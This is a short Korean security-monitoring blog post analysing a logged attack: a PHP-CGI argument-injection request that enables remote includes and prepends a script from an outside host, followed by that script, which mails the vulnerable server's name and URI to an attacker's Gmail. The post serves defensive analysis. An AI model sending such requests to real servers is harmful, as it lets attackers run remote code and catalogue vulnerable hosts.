GET index.php/?-d allow_url_include=On -d auto_prepend_file=http://netsunucum.com/status/-/d.txt
위 요청은 외부의 파일을 include, include_once, require, require_once 와 같은 파일로 include 허용시키고, http://netsunucum.com/status/-/d.txt 파일을 실행키려는 것이다.(index.php를 나중에 실행한다.)
http://netsunucum.com/status/-/d.txt 파일의 내용은 아래와 같다.
SP4M3R
<?php
$from = "INBOX <h4x0r@r0x.com">";
$sentTo = "vaidominio2@gmail.com";
$subject = "VULN r0x";
$msg_body = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$header_info = "From: ".$from;
mail($sentTo, $subject, $msg_body, $header_info);
?>
php 웹 서버가 취약하면, 위의 코드가 실행되서 공격자의 gmail계정으로 서버명과 요청 URI가 전송된다.
php 웹 서버가 취약하면, 위의 코드가 실행되서 공격자의 gmail계정으로 서버명과 요청 URI가 전송된다.
'보안관제 > 보안관제 이벤트' 카테고리의 다른 글
ICMP Destination Port Unreachable (0) | 2016.02.10 |
---|---|
중국 만리장성 방화벽 (0) | 2016.01.06 |
robots.txt 파일에 접근하는 클라이언트를 차단 하는것이 적절한가 (0) | 2015.11.26 |
User-Agent: friendly-scanner (0) | 2015.11.25 |
base64 encode PHP Execute (0) | 2015.11.25 |